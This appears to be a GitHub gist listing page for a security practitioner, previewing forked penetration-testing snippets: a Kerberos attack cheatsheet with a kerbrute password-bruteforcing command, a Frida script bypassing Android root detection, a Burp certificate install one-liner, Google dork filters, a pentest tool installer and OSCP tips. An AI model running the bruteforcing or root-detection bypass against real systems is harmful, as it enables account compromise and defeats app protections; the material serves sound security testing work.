Skip to content

Instantly share code, notes, and snippets.

View ikuamike's full-sized avatar

Michael Ikua ikuamike

View GitHub Profile
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
@ikuamike
ikuamike / kerberos_attacks_cheatsheet.md
Created September 3, 2020 14:47 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@ikuamike
ikuamike / sid2str.py
Created June 16, 2020 22:13 — forked from mprahl/sid2str.py
Python 2.7/3.5 function to convert an Active Directory binary SID to string format (sid_to_str)
import sys
import struct
def sid_to_str(sid):
""" Converts a hexadecimal string returned from the LDAP query to a
string version of the SID in format of S-1-5-21-1270288957-3800934213-3019856503-500
This function was based from: http://www.gossamer-threads.com/lists/apache/bugs/386930
"""
# The revision level (typically 1)
@ikuamike
ikuamike / root_bypass.js
Created May 6, 2020 10:58 — forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@ikuamike
ikuamike / android-burp-cert.sh
Created April 29, 2020 21:00 — forked from vavkamil/android-burp-cert.sh
One Liner For Installing Burp Certificate Into Android Nougat and Later
# https://securitychops.com/2019/08/31/dev/random/one-liner-to-install-burp-cacert-into-android.html
#
curl --proxy http://127.0.0.1:8080 -o cacert.der http://burp/cert \
&& openssl x509 -inform DER -in cacert.der -out cacert.pem \
&& cp cacert.der $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 \
&& adb root \
&& adb remount \
&& adb push $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 /sdcard/ \
&& echo -n "mv /sdcard/$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 /system/etc/security/cacerts/" | adb shell \
&& echo -n "chmod 644 /system/etc/security/cacerts/$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0" | adb shell \
@ikuamike
ikuamike / GoogleDorking.md
Created February 22, 2020 20:12 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
@ikuamike
ikuamike / SimpleHTTPServerWithUpload.py
Created September 2, 2019 17:57 — forked from touilleMan/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload - Python3 version
#!/usr/bin/env python3
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
see: https://gist.github.com/UniIsland/3346170
"""
@ikuamike
ikuamike / pentest.sh
Created May 9, 2019 19:54 — forked from OffXec/pentest.sh
Installs pentesting tools, then symlinks them to be ran seamlessly.
#/bin/bash
git clone https://github.com/danielmiessler/SecLists.git /opt/seclists
git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
chmod +x /opt/xsstrike/xsstrike.py
git clone https://github.com/s0md3v/Arjun.git /opt/arjun
sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors